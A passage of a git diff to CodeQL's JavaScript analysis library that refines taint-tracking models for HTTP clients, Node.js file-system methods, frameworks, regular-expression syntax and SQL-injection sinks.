call.getCallback(0).getExceptionalReturn() and obj = call ) + or + exists(DataFlow::FunctionNode f | f.getFunction().isAsync() | + // ordinary return + prop = valueProp() and + value = f.getAReturn() and + obj = f.getReturnNode() + or + // exceptional return + prop = errorProp() and + localExceptionStepWithAsyncFlag(value, obj, true) + ) } /** @@ -525,30 +537,6 @@ private class PromiseTaintStep extends TaintTracking::LegacyTaintStep { * Defines flow steps for return on async functions. */ private module AsyncReturnSteps { - private predicate valueProp = Promises::valueProp/0; - - private predicate errorProp = Promises::errorProp/0; - - private import semmle.javascript.dataflow.internal.FlowSteps - - /** - * A data-flow step for ordinary and exceptional returns from async functions. - */ - private class AsyncReturn extends LegacyPreCallGraphStep { - override predicate storeStep(DataFlow::Node pred, DataFlow::SourceNode succ, string prop) { - exists(DataFlow::FunctionNode f | f.getFunction().isAsync() | - // ordinary return - prop = valueProp() and - pred = f.getAReturn() and - succ = f.getReturnNode() - or - // exceptional return - prop = errorProp() and - localExceptionStepWithAsyncFlag(pred, succ, true) - ) - } - } - /** * A data-flow step for ordinary return from an async function in a taint configuration. */ diff --git a/javascript/ql/lib/semmle/javascript/Regexp.qll b/javascript/ql/lib/semmle/javascript/Regexp.qll index acfc888756e8..642a3d196fb7 100644 --- a/javascript/ql/lib/semmle/javascript/Regexp.qll +++ b/javascript/ql/lib/semmle/javascript/Regexp.qll @@ -301,6 +301,51 @@ class RegExpAlt extends RegExpTerm, @regexp_alt { override string getAPrimaryQlClass() { result = "RegExpAlt" } } +/** + * An intersection term, that is, a term of the form `[[a]&&[ab]]`. + * + * Example: + * + * ``` + * /[[abc]&&[bcd]]/v - which matches 'b' and 'c' only. + * ``` + */ +class RegExpIntersection extends RegExpTerm, @regexp_intersection { + /** Gets an intersected term of this term. */ + RegExpTerm getAnElement() { result = this.getAChild() } + + /** Gets the number of intersected terms of this term. */ + int getNumIntersectedTerm() { result = this.getNumChild() } + + override predicate isNullable() { this.getAnElement().isNullable() } + + override string getAPrimaryQlClass() { result = "RegExpIntersection" } +} + +/** + * A subtraction term, that is, a term of the form `[[a]--[ab]]`. + * + * Example: + * + * ``` + * /[[abc]--[bc]]/v - which matches 'a' only. + * ``` + */ +class RegExpSubtraction extends RegExpTerm, @regexp_subtraction { + /** Gets the minuend (left operand) of this subtraction. */ + RegExpTerm getFirstTerm() { result = this.getChild(0) } + + /** Gets the number of subtractions terms of this term. */ + int getNumSubtractedTerm() { result = this.getNumChild() - 1 } + + /** Gets a subtrahend (right operand) of this subtraction. */ + RegExpTerm getASubtractedTerm() { exists(int i | i > 0 and result = this.getChild(i)) } + + override predicate isNullable() { none() } + + override string getAPrimaryQlClass() { result = "RegExpSubtraction" } +} + /** * A sequence term. * @@ -1142,6 +1187,28 @@ private class StringConcatRegExpPatternSource extends RegExpPatternSource { override RegExpTerm getRegExpTerm() { result = this.asExpr().(AddExpr).asRegExp() } } +/** + * A quoted string escape in a regular expression, using the `\q` syntax. + * The only operation supported inside a quoted string is alternation, using `|`. + * + * Example: + * + * ``` + * \q{foo} + * \q{a|b|c} + * ``` + */ +class RegExpQuotedString extends RegExpTerm, @regexp_quoted_string { + /** Gets the term representing the contents of this quoted string. */ + RegExpTerm getTerm() { result = this.getAChild() } + + override predicate isNullable() { none() } + + override string getAMatchedString() { result = this.getTerm().getAMatchedString() } + + override string getAPrimaryQlClass() { result = "RegExpQuotedString" } +} + module RegExp { /** Gets the string `"?"` used to represent a regular expression whose flags are unknown. */ string unknownFlag() { result = "?" } diff --git a/javascript/ql/lib/semmle/javascript/Routing.qll b/javascript/ql/lib/semmle/javascript/Routing.qll index 93e5cd243285..29700a255d61 100644 --- a/javascript/ql/lib/semmle/javascript/Routing.qll +++ b/javascript/ql/lib/semmle/javascript/Routing.qll @@ -188,27 +188,35 @@ module Routing { ) } - /** - * Gets the path prefix needed to reach this node from the given ancestor, that is, the concatenation - * of all relative paths between this node and the ancestor. - * - * To restrict the size of the predicate, this is only available for the ancestors that are "fork" nodes, - * that is, a node that has siblings (i.e. multiple children). - */ - private string getPathFromFork(Node fork) { + private string getPathFromForkInternal(Node fork) { this.isFork() and this = fork and result = "" or exists(Node parent | parent = this.getParent() | not exists(parent.getRelativePath()) and - result = parent.getPathFromFork(fork) + result = parent.getPathFromForkInternal(fork) or - result = parent.getPathFromFork(fork) + parent.getRelativePath() and + result = parent.getPathFromForkInternal(fork) + parent.getRelativePath() and result.length() < 100 ) } + /** + * Gets the path prefix needed to reach this node from the given ancestor, that is, the concatenation + * of all relative paths between this node and the ancestor. + * + * To restrict the size of the predicate, this is only available for the ancestors that are "fork" nodes, + * that is, a node that has siblings (i.e. multiple children). + * And only a single (shortest) path is returned, even if there are multiple paths + * leading to this node. + */ + pragma[nomagic] + private string getPathFromFork(Node fork) { + result = + min(string res | res = this.getPathFromForkInternal(fork) | res order by res.length(), res) + } + /** * Gets an HTTP method required to reach this node from the given ancestor, or `*` if any method * can be used. diff --git a/javascript/ql/lib/semmle/javascript/TypeScript.qll b/javascript/ql/lib/semmle/javascript/TypeScript.qll index a234fec7c2de..d8b6b63a366f 100644 --- a/javascript/ql/lib/semmle/javascript/TypeScript.qll +++ b/javascript/ql/lib/semmle/javascript/TypeScript.qll @@ -773,6 +773,17 @@ class LocalTypeAccess extends @local_type_access, TypeAccess, Identifier, Lexica */ LocalTypeName getLocalTypeName() { result.getAnAccess() = this } + private TypeAliasDeclaration getAlias() { + this.getLocalTypeName().getADeclaration() = result.getIdentifier() + } + + override TypeExpr getAnUnderlyingType() { + result = this.getAlias().getDefinition().getAnUnderlyingType() + or + not exists(this.getAlias()) and + result = this + } + override string getAPrimaryQlClass() { result = "LocalTypeAccess" } } diff --git a/javascript/ql/lib/semmle/javascript/dataflow/TaintTracking.qll b/javascript/ql/lib/semmle/javascript/dataflow/TaintTracking.qll index 532fd95be472..e8d9cef9f575 100644 --- a/javascript/ql/lib/semmle/javascript/dataflow/TaintTracking.qll +++ b/javascript/ql/lib/semmle/javascript/dataflow/TaintTracking.qll @@ -494,7 +494,8 @@ module TaintTracking { succ = c and c = DataFlow::globalVarRef([ - "encodeURI", "decodeURI", "encodeURIComponent", "decodeURIComponent" + "encodeURI", "decodeURI", "encodeURIComponent", "decodeURIComponent", "unescape", + "escape" ]).getACall() and pred = c.getArgument(0) ) diff --git a/javascript/ql/lib/semmle/javascript/dataflow/internal/Contents.qll b/javascript/ql/lib/semmle/javascript/dataflow/internal/Contents.qll index 23b2311594e4..5cf5bf1e48eb 100644 --- a/javascript/ql/lib/semmle/javascript/dataflow/internal/Contents.qll +++ b/javascript/ql/lib/semmle/javascript/dataflow/internal/Contents.qll @@ -57,6 +57,16 @@ module Private { this = getAPreciseArrayIndex().toString() or isAccessPathTokenPresent("Member", this) + or + this = any(ImportSpecifier spec).getImportedName() + or + this = any(ExportSpecifier n).getExportedName() + or + this = any(ExportNamedDeclaration d).getAnExportedDecl().getName() + or + this = any(MemberDefinition m).getName() + or + this = ["exports", "default"] } /** Gets the array index corresponding to this property name. */ diff --git a/javascript/ql/lib/semmle/javascript/dataflow/internal/DataFlowPrivate.qll b/javascript/ql/lib/semmle/javascript/dataflow/internal/DataFlowPrivate.qll index 974947e22852..29128bb72fa6 100644 --- a/javascript/ql/lib/semmle/javascript/dataflow/internal/DataFlowPrivate.qll +++ b/javascript/ql/lib/semmle/javascript/dataflow/internal/DataFlowPrivate.qll @@ -372,10 +372,11 @@ class CastNode extends DataFlow::Node { cached newtype TDataFlowCallable = MkSourceCallable(StmtContainer container) or - MkLibraryCallable(LibraryCallable callable) + MkLibraryCallable(LibraryCallable callable) or + MkFileCallable(File file) /** - * A callable entity. This is a wrapper around either a `StmtContainer` or a `LibraryCallable`. + * A callable entity. This is a wrapper around either a `StmtContainer`, `LibraryCallable`, or `File`. */ class DataFlowCallable extends TDataFlowCallable { /** Gets a string representation of this callable. */ @@ -383,14 +384,21 @@ class DataFlowCallable extends TDataFlowCallable { result = this.asSourceCallable().toString() or result = this.asLibraryCallable() + or + result = this.asFileCallable().toString() } /** Gets the location of this callable, if it is present in the source code. */ - Location getLocation() { result = this.asSourceCallable().getLocation() } + Location getLocation() { + result = this.asSourceCallable().getLocation() or result = this.asFileCallable().getLocation() + } /** Gets the corresponding `StmtContainer` if this is a source callable. */ StmtContainer asSourceCallable() { this = MkSourceCallable(result) } + /** Gets the corresponding `File` if this is a file representing a callable. */ + File asFileCallable() { this = MkFileCallable(result) } + /** Gets the corresponding `StmtContainer` if this is a source callable. */ pragma[nomagic] StmtContainer asSourceCallableNotExterns() { @@ -537,6 +545,10 @@ DataFlowCallable nodeGetEnclosingCallable(Node node) { result.asLibraryCallable() = node.(FlowSummaryDefaultExceptionalReturn).getSummarizedCallable() or node = TGenericSynthesizedNode(_, _, result) + or + node instanceof DataFlow::HtmlAttributeNode and result.asFileCallable() = node.getFile() + or + node instanceof DataFlow::XmlAttributeNode and result.asFileCallable() = node.getFile() } newtype TDataFlowType = diff --git a/javascript/ql/lib/semmle/javascript/dataflow/internal/sharedlib/Ssa.qll b/javascript/ql/lib/semmle/javascript/dataflow/internal/sharedlib/Ssa.qll index 4fee3f98b171..adc4a79dd046 100644 --- a/javascript/ql/lib/semmle/javascript/dataflow/internal/sharedlib/Ssa.qll +++ b/javascript/ql/lib/semmle/javascript/dataflow/internal/sharedlib/Ssa.qll @@ -56,14 +56,7 @@ module SsaDataflowInput implements DataFlowIntegrationInputSig { predicate hasCfgNode(js::BasicBlock bb, int i) { this = bb.getNode(i) } } - predicate ssaDefAssigns(WriteDefinition def, Expr value) { - // This library only handles use-use flow after a post-update, there are no definitions, only uses. - none() - } - - class Parameter = js::Parameter; - - predicate ssaDefInitializesParam(WriteDefinition def, Parameter p) { + predicate ssaDefHasSource(WriteDefinition def) { // This library only handles use-use flow after a post-update, there are no definitions, only uses. none() } @@ -81,25 +74,29 @@ module SsaDataflowInput implements DataFlowIntegrationInputSig { class Guard extends js::ControlFlowNode { Guard() { this = any(js::ConditionGuardNode g).getTest() } - predicate hasCfgNode(js::BasicBlock bb, int i) { this = bb.getNode(i) } + /** + * Holds if the control flow branching from `bb1` is dependent on this guard, + * and that the edge from `bb1` to `bb2` corresponds to the evaluation of this + * guard to `branch`. + */ + predicate controlsBranchEdge(js::BasicBlock bb1, js::BasicBlock bb2, boolean branch) { + exists(js::ConditionGuardNode g | + g.getTest() = this and + bb1 = this.getBasicBlock() and + bb2 = g.getBasicBlock() and + branch = g.getOutcome() + ) + } } pragma[inline] - predicate guardControlsBlock(Guard guard, js::BasicBlock bb, boolean branch) { + predicate guardDirectlyControlsBlock(Guard guard, js::BasicBlock bb, boolean branch) { exists(js::ConditionGuardNode g | g.getTest() = guard and g.dominates(bb) and branch = g.getOutcome() ) } - - js::BasicBlock getAConditionalBasicBlockSuccessor(js::BasicBlock bb, boolean branch) { - exists(js::ConditionGuardNode g | - bb = g.getTest().getBasicBlock() and - result = g.getBasicBlock() and - branch = g.getOutcome() - ) - } } import DataFlowIntegration diff --git a/javascript/ql/lib/semmle/javascript/frameworks/Angular2.qll b/javascript/ql/lib/semmle/javascript/frameworks/Angular2.qll index a2702dbc7429..3441b5d9c006 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/Angular2.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/Angular2.qll @@ -190,13 +190,16 @@ module Angular2 { result.hasUnderlyingType("@angular/common/http", "HttpClient") } + /** Gets a reference to an `HttpClient` object using the API graph. */ + API::Node httpClientApiNode() { result = API::Node::ofType("@angular/common/http", "HttpClient") } + private class AngularClientRequest extends ClientRequest::Range, DataFlow::MethodCallNode { int argumentOffset; AngularClientRequest() { - this = httpClient().getAMethodCall("request") and argumentOffset = 1 + this = httpClientApiNode().getMember("request").getACall() and argumentOffset = 1 or - this = httpClient().getAMethodCall() and + this = httpClientApiNode().getAMember().getACall() and not this.getMethodName() = "request" and argumentOffset = 0 } diff --git a/javascript/ql/lib/semmle/javascript/frameworks/ClientRequests.qll b/javascript/ql/lib/semmle/javascript/frameworks/ClientRequests.qll index 720d917d4985..673bdf2de33f 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/ClientRequests.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/ClientRequests.qll @@ -222,7 +222,10 @@ module ClientRequest { method = "request" or this = axios().getMember(method).getACall() and - method = [httpMethodName(), "request"] + method = [httpMethodName(), "request", "postForm", "putForm", "patchForm", "getUri"] + or + this = axios().getMember("create").getReturn().getACall() and + method = "request" } private int getOptionsArgIndex() { @@ -254,6 +257,8 @@ module ClientRequest { method = ["post", "put"] and result = [this.getArgument(1), this.getOptionArgument(2, "data")] or + method = ["postForm", "putForm", "patchForm"] and result = this.getArgument(1) + or result = this.getOptionArgument([0 .. 2], ["headers", "params"]) } @@ -414,20 +419,74 @@ module ClientRequest { } } + /** + * Represents an instance of the `got` HTTP client library. + */ + abstract private class GotInstance extends API::Node { + /** + * Gets the options object associated with this instance of `got`. + */ + API::Node getOptions() { none() } + } + + /** + * Represents the root `got` module import. + * For example: `const got = require('got')`. + */ + private class RootGotInstance extends GotInstance { + RootGotInstance() { this = API::moduleImport("got") } + } + + /** + * Represents an instance of `got` created by calling the `extend()` method. + * It may also be chained with multiple calls to `extend()`. + * + * For example: `const client = got.extend({ prefixUrl: 'https://example.com' })`. + */ + private class ExtendGotInstance extends GotInstance { + private GotInstance base; + private API::CallNode extendCall; + + ExtendGotInstance() { + extendCall = base.getMember("extend").getACall() and + this = extendCall.getReturn() + } + + override API::Node getOptions() { + result = extendCall.getParameter(0) or result = base.getOptions() + } + } + /** * A model of a URL request made using the `got` library. */ class GotUrlRequest extends ClientRequest::Range { + GotInstance got; + GotUrlRequest() { - exists(API::Node callee, API::Node got | this = callee.getACall() | - got = [API::moduleImport("got"), API::moduleImport("got").getMember("extend").getReturn()] and - callee = [got, got.getMember(["stream", "get", "post", "put", "patch", "head", "delete"])] + exists(API::Node callee | this = callee.getACall() | + callee = + [ + got, + got.getMember(["stream", "get", "post", "put", "patch", "head", "delete", "paginate"]) + ] ) } override DataFlow::Node getUrl() { result = this.getArgument(0) and not exists(this.getOptionArgument(1, "baseUrl")) + or + // Handle URL from options passed to extend() + result = got.getOptions().getMember("url").asSink() and + not exists(this.getArgument(0)) + or + // Handle URL from options passed as third argument when first arg is undefined/missing + exists(API::InvokeNode optionsCall | + optionsCall = API::moduleImport("got").getMember("Options").getAnInvocation() and + optionsCall.getReturn().getAValueReachableFromSource() = this.getAnArgument() and + result = optionsCall.getParameter(0).getMember("url").asSink() + ) } override DataFlow::Node getHost() { @@ -513,6 +572,13 @@ module ClientRequest { } } + /** + * Gets the name of a superagent request method. + */ + private string getSuperagentRequestMethodName() { + result = [httpMethodName(), any(Http::RequestMethodName m), "del", "DEL"] + } + /** * A model of a URL request made using the `superagent` library. */ @@ -520,10 +586,22 @@ module ClientRequest { DataFlow::Node url; SuperAgentUrlRequest() { - exists(string moduleName, DataFlow::SourceNode callee | this = callee.getACall() | - moduleName = "superagent" and - callee = DataFlow::moduleMember(moduleName, httpMethodName()) and + exists(string moduleName | moduleName = "superagent" | + // Handle method calls like superagent.get(url) + this = API::moduleImport(moduleName).getMember(getSuperagentRequestMethodName()).getACall() and url = this.getArgument(0) + or + // Handle direct calls like superagent('GET', url) + this = API::moduleImport(moduleName).getACall() and + this.getArgument(0).mayHaveStringValue(getSuperagentRequestMethodName()) and + url = this.getArgument(1) + or + // Handle agent calls like superagent.agent().get(url) + exists(DataFlow::SourceNode agent | + agent = API::moduleImport(moduleName).getMember("agent").getACall() and + this = agent.getAMethodCall(httpMethodName()) and + url = this.getArgument(0) + ) ) } diff --git a/javascript/ql/lib/semmle/javascript/frameworks/D3.qll b/javascript/ql/lib/semmle/javascript/frameworks/D3.qll index 76bdeb1324a9..cc7c07c80c19 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/D3.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/D3.qll @@ -80,7 +80,7 @@ module D3 { or this = d3Selection().getMember("node").getReturn().asSource() or - this = d3Selection().getMember("nodes").getReturn().getUnknownMember().asSource() + this = d3Selection().getMember("nodes").getReturn().getArrayElement().asSource() } } diff --git a/javascript/ql/lib/semmle/javascript/frameworks/Hapi.qll b/javascript/ql/lib/semmle/javascript/frameworks/Hapi.qll index f1936da3a676..a6dbf40d1e06 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/Hapi.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/Hapi.qll @@ -11,8 +11,8 @@ module Hapi { */ class ServerDefinition extends Http::Servers::StandardServerDefinition, DataFlow::Node { ServerDefinition() { - // `server = new Hapi.Server()` - this = DataFlow::moduleMember("hapi", "Server").getAnInstantiation() + // `server = new Hapi.Server()`, `server = Hapi.server()` + this = DataFlow::moduleMember(["hapi", "@hapi/hapi"], ["Server", "server"]).getAnInvocation() or // `server = Glue.compose(manifest, composeOptions)` this = DataFlow::moduleMember("@hapi/glue", "compose").getAnInvocation() diff --git a/javascript/ql/lib/semmle/javascript/frameworks/Markdown.qll b/javascript/ql/lib/semmle/javascript/frameworks/Markdown.qll index 04f3c9f7db78..344bdc2a40fc 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/Markdown.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/Markdown.qll @@ -46,19 +46,6 @@ module Markdown { } } - /** - * A taint step for the `markdown-table` library. - */ - private class MarkdownTableStep extends MarkdownStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - exists(DataFlow::CallNode call | call = DataFlow::moduleImport("markdown-table").getACall() | - // TODO: needs a flow summary to ensure ArrayElement content is unfolded - succ = call and - pred = call.getArgument(0) - ) - } - } - /** * A taint step for the `showdown` library. */ diff --git a/javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll b/javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll index 3427591bc1b7..c5f8c3d14f1c 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/NodeJSLib.qll @@ -434,7 +434,7 @@ module NodeJSLib { * method might represent a file path. */ private predicate fsExtraExtensionFileParam(string methodName, int i) { - methodName = ["copy", "copySync", "copyFile"] and i = [0, 1] + methodName = ["copy", "copySync", "copyFile", "cp", "copyFileSync", "cpSync"] and i = [0, 1] or methodName = ["move", "moveSync"] and i = [0, 1] or @@ -450,10 +450,13 @@ module NodeJSLib { or methodName = ["readJson", "readJSON", "readJsonSync", "readJSONSync"] and i = 0 or - methodName = ["remove", "removeSync"] and i = 0 + methodName = ["remove", "removeSync", "rmSync", "rm", "rmdir", "rmdirSync"] and i = 0 or methodName = - ["outputJSON", "outputJson", "writeJSON", "writeJson", "writeJSONSync", "writeJsonSync"] and + [ + "outputJSON", "outputJson", "writeJSON", "writeJson", "writeJSONSync", "writeJsonSync", + "outputJSONSync", "outputJsonSync" + ] and i = 0 or methodName = ["ensureFile", "ensureFileSync"] and i = 0 @@ -462,9 +465,15 @@ module NodeJSLib { or methodName = ["ensureSymlink", "ensureSymlinkSync"] and i = [0, 1] or - methodName = ["emptyDir", "emptyDirSync"] and i = 0 + methodName = ["emptyDir", "emptyDirSync", "emptydir", "emptydirSync"] and i = 0 or methodName = ["pathExists", "pathExistsSync"] and i = 0 + or + methodName = ["lutimes", "lutimesSync"] and i = 0 + or + methodName = + ["opendir", "opendirSync", "openAsBlob", "statfs", "statfsSync", "open", "openSync"] and + i = 0 } /** @@ -592,6 +601,13 @@ module NodeJSLib { } } + /** A vectored write to the file system using `writev` or `writevSync` methods. */ + private class NodeJSFileSystemVectorWrite extends FileSystemWriteAccess, NodeJSFileSystemAccess { + NodeJSFileSystemVectorWrite() { methodName = ["writev", "writevSync"] } + + override DataFlow::Node getADataNode() { result = this.getArgument(1) } + } + /** A file system read. */ private class NodeJSFileSystemAccessRead extends FileSystemReadAccess, NodeJSFileSystemAccess { NodeJSFileSystemAccessRead() { methodName = ["read", "readSync", "readFile", "readFileSync"] } @@ -599,7 +615,7 @@ module NodeJSLib { override DataFlow::Node getADataNode() { if methodName.matches("%Sync") then result = this - else + else ( exists(int i, string paramName | fsDataParam(methodName, i, paramName) | if paramName = "callback" then @@ -610,6 +626,28 @@ module NodeJSLib { ) else result = this.getArgument(i) ) + or + exists(AwaitExpr await | + this.getEnclosingExpr() = await.getOperand() and + result = DataFlow::valueNode(await) + ) + ) + } + } + + /** A vectored read to the file system. */ + private class NodeJSFileSystemAccessVectorRead extends FileSystemReadAccess, + NodeJSFileSystemAccess + { + NodeJSFileSystemAccessVectorRead() { methodName = ["readv", "readvSync"] } + + override DataFlow::Node getADataNode() { + result = this.getArgument(1) + or + exists(DataFlow::ArrayCreationNode array | + array.flowsTo(this.getArgument(1)) and + result = array.getAnElement() + ) } } diff --git a/javascript/ql/lib/semmle/javascript/frameworks/Puppeteer.qll b/javascript/ql/lib/semmle/javascript/frameworks/Puppeteer.qll index 0834d81e0a1f..59bb2fc2b137 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/Puppeteer.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/Puppeteer.qll @@ -32,7 +32,7 @@ module Puppeteer { or result = [browser(), context()].getMember("newPage").getReturn().getPromised() or - result = [browser(), context()].getMember("pages").getReturn().getPromised().getUnknownMember() + result = [browser(), context()].getMember("pages").getReturn().getPromised().getArrayElement() or result = target().getMember("page").getReturn().getPromised() } @@ -45,7 +45,7 @@ module Puppeteer { or result = [page(), browser()].getMember("target").getReturn() or - result = context().getMember("targets").getReturn().getUnknownMember() + result = context().getMember("targets").getReturn().getArrayElement() or result = target().getMember("opener").getReturn() } @@ -58,7 +58,7 @@ module Puppeteer { or result = [page(), target()].getMember("browserContext").getReturn() or - result = browser().getMember("browserContexts").getReturn().getUnknownMember() + result = browser().getMember("browserContexts").getReturn().getArrayElement() or result = browser().getMember("createIncognitoBrowserContext").getReturn().getPromised() or diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index c5452676e309..59ee6d6db4f5 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll @@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/lib/semmle/javascript/frameworks/Tanstack.qll b/javascript/ql/lib/semmle/javascript/frameworks/Tanstack.qll deleted file mode 100644 index 741079575963..000000000000 --- a/javascript/ql/lib/semmle/javascript/frameworks/Tanstack.qll +++ /dev/null @@ -1,26 +0,0 @@ -/** - * Provides classes and predicates modeling the Tanstack/react-query library. - */ - -private import javascript - -/** - * An additional flow step that propagates data from the return value of the query function, - * defined in a useQuery call from the '@tanstack/react-query' module, to the 'data' property. - */ -private class TanstackStep extends DataFlow::AdditionalFlowStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - exists(API::CallNode useQuery | - useQuery = useQueryCall() and - node1 = useQuery.getParameter(0).getMember("queryFn").getReturn().getPromised().asSink() and - node2 = useQuery.getReturn().getMember("data").asSource() - ) - } -} - -/** - * Retrieves a call node representing a useQuery invocation from the '@tanstack/react-query' module. - */ -private API::CallNode useQueryCall() { - result = API::moduleImport("@tanstack/react-query").getMember("useQuery").getACall() -} diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UnderscoreDotString.qll b/javascript/ql/lib/semmle/javascript/frameworks/UnderscoreDotString.qll new file mode 100644 index 000000000000..abb51b978bc0 --- /dev/null +++ b/javascript/ql/lib/semmle/javascript/frameworks/UnderscoreDotString.qll @@ -0,0 +1,26 @@ +/** + * Provides classes for modeling data flow behavior of the Underscore.string library (https://www.npmjs.com/package/underscore.string). + */ + +private import javascript +private import semmle.javascript.dataflow.internal.AdditionalFlowInternal + +/** + * Models data flow for the Underscore.string library. + */ +private class UnderscoreDotString extends AdditionalFlowInternal { + /** + * Some of the methods in `underscore.string` have the same name as methods from `Array.prototype`. + * This prevents methods like `splice` from propagating into Argument[this].ArrayElement. + */ + override predicate clearsContent(DataFlow::Node node, DataFlow::ContentSet contents) { + exists(DataFlow::CallNode call | + call = + ModelOutput::getATypeNode(["'underscore.string'.Wrapper", "'underscore.string'"]) + .getAMember() + .getACall() and + node = call.getReceiver().getPostUpdateNode() and + contents = DataFlow::ContentSet::arrayElement() + ) + } +} diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll @@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/lib/semmle/javascript/frameworks/Vuex.qll b/javascript/ql/lib/semmle/javascript/frameworks/Vuex.qll index 6e1112077909..49a9ded864b6 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/Vuex.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/Vuex.qll @@ -104,8 +104,7 @@ module Vuex { storeName = this.getNamespace() + localName or // mapGetters(['foo', 'bar']) - this.getLastParameter().getUnknownMember().getAValueReachingSink().getStringValue() = - localName and + this.getLastParameter().getArrayElement().getAValueReachingSink().getStringValue() = localName and storeName = this.getNamespace() + localName or // mapGetters({foo: 'bar'}) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/data/internal/ApiGraphModelsSpecific.qll b/javascript/ql/lib/semmle/javascript/frameworks/data/internal/ApiGraphModelsSpecific.qll index 1b1df4ceef35..1f51af3efda0 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/data/internal/ApiGraphModelsSpecific.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/data/internal/ApiGraphModelsSpecific.qll @@ -162,8 +162,8 @@ API::Node getExtraSuccessorFromNode(API::Node node, AccessPathTokenBase token) { token.getName() = "Awaited" and result = node.getPromised() or - token.getName() = "ArrayElement" and - result = node.getMember(DataFlow::PseudoProperties::arrayElement()) + token.getName() = ["ArrayElement", "Element"] and + result = node.getArrayElement() or token.getName() = "Element" and result = node.getMember(DataFlow::PseudoProperties::arrayLikeElement()) @@ -172,11 +172,6 @@ API::Node getExtraSuccessorFromNode(API::Node node, AccessPathTokenBase token) { token.getName() = "MapValue" and result = node.getMember(DataFlow::PseudoProperties::mapValueAll()) or - // Currently we need to include the "unknown member" for ArrayElement and Element since - // API graphs do not use store/load steps for arrays - token.getName() = ["ArrayElement", "Element"] and - result = node.getUnknownMember() - or token.getName() = "Parameter" and token.getAnArgument() = "this" and result = node.getReceiver() @@ -189,6 +184,20 @@ API::Node getExtraSuccessorFromNode(API::Node node, AccessPathTokenBase token) { or token.getName() = "DecoratedParameter" and result = node.getADecoratedParameter() + or + token.getName() = "GuardedRouteHandler" and + result = getAGuardedRouteHandlerApprox(node) +} + +bindingset[node] +pragma[inline_late] +private API::Node getAGuardedRouteHandlerApprox(API::Node node) { + // For now just get any routing node with the same root (i.e. the same web app), as + // there are some known performance issues when checking if it is actually guarded by the given node. + exists(JS::Routing::Node root | + root = JS::Routing::getNode(node.getAValueReachableFromSource()).getRootNode() and + root = JS::Routing::getNode(result.asSink()).getRootNode() + ) } /** @@ -322,7 +331,7 @@ predicate isExtraValidTokenNameInIdentifyingAccessPath(string name) { [ "Member", "AnyMember", "Instance", "Awaited", "ArrayElement", "Element", "MapValue", "NewCall", "Call", "DecoratedClass", "DecoratedMember", "DecoratedParameter", - "WithStringArgument" + "WithStringArgument", "GuardedRouteHandler" ] } @@ -334,7 +343,7 @@ predicate isExtraValidNoArgumentTokenInIdentifyingAccessPath(string name) { name = [ "AnyMember", "Instance", "Awaited", "ArrayElement", "Element", "MapValue", "NewCall", "Call", - "DecoratedClass", "DecoratedMember", "DecoratedParameter" + "DecoratedClass", "DecoratedMember", "DecoratedParameter", "GuardedRouteHandler" ] } @@ -373,7 +382,7 @@ bindingset[pred] predicate apiGraphHasEdge(API::Node pred, string path, API::Node succ) { exists(string name | succ = pred.getMember(name) and path = "Member[" + name + "]") or - succ = pred.getUnknownMember() and path = "AnyMember" + succ = pred.getUnknownArrayElement() and path = "ArrayElement" or succ = pred.getInstance() and path = "Instance" or diff --git a/javascript/ql/lib/semmle/javascript/internal/CachedStages.qll b/javascript/ql/lib/semmle/javascript/internal/CachedStages.qll index 470435ce23ca..98a35692822e 100644 --- a/javascript/ql/lib/semmle/javascript/internal/CachedStages.qll +++ b/javascript/ql/lib/semmle/javascript/internal/CachedStages.qll @@ -297,13 +297,12 @@ module Stages { exists( API::moduleImport("foo") .getMember("bar") 